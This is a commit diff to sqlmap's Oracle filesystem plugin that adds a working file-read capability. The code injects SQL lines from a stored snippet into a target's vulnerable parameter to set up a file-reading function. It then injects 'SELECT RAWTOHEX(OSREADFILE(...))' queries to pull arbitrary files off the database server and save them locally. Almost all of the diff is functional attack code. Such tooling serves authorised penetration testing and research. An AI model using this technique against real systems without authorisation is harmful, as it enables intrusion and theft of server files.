Implementing support for --file-read on Oracle (Issue #26)

2025-12-06 20:51:31 +00:00 · 2019-06-03 14:21:26 +02:00
parent b3cdec547b
commit c00a642569
5 changed files with 55 additions and 11 deletions
--- a/plugins/dbms/oracle/filesystem.py
+++ b/plugins/dbms/oracle/filesystem.py
@@ -5,14 +5,51 @@ Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

+from lib.core.agent import agent
+from lib.core.common import dataToOutFile
+from lib.core.common import decodeDbmsHexValue
+from lib.core.common import getSQLSnippet
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.enums import CHARSET_TYPE
+from lib.core.enums import DBMS
 from lib.core.exception import SqlmapUnsupportedFeatureException
+from lib.request import inject
+from lib.request.connect import Connect as Request
 from plugins.generic.filesystem import Filesystem as GenericFilesystem

 class Filesystem(GenericFilesystem):
    def readFile(self, remoteFile):
-        errMsg = "File system read access not yet implemented for "
-        errMsg += "Oracle"
-        raise SqlmapUnsupportedFeatureException(errMsg)
+        localFilePaths = []
+        snippet = getSQLSnippet(DBMS.ORACLE, "read_file_export_extension")
+
+        for query in snippet.split("\n"):
+            query = query.strip()
+            query = agent.prefixQuery("OR (%s) IS NULL" % query)
+            query = agent.suffixQuery(query, trimEmpty=False)
+            payload = agent.payload(newValue=query)
+            Request.queryPage(payload, content=False, raise404=False, silent=True, noteResponseTime=False)
+
+        for remoteFile in remoteFile.split(','):
+            infoMsg = "fetching file: '%s'" % remoteFile
+            logger.info(infoMsg)
+
+            kb.fileReadMode = True
+            fileContent = inject.getValue("SELECT RAWTOHEX(OSREADFILE('%s')) FROM DUAL" % remoteFile, charsetType=CHARSET_TYPE.HEXADECIMAL)
+            kb.fileReadMode = False
+
+            if fileContent is not None:
+                fileContent = decodeDbmsHexValue(fileContent, True)
+
+                if fileContent:
+                    localFilePath = dataToOutFile(remoteFile, fileContent)
+
+                    localFilePaths.append(localFilePath)
+                else:
+                    errMsg = "no data retrieved"
+                    logger.error(errMsg)
+
+        return localFilePaths

    def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
        errMsg = "File system write access not yet implemented for "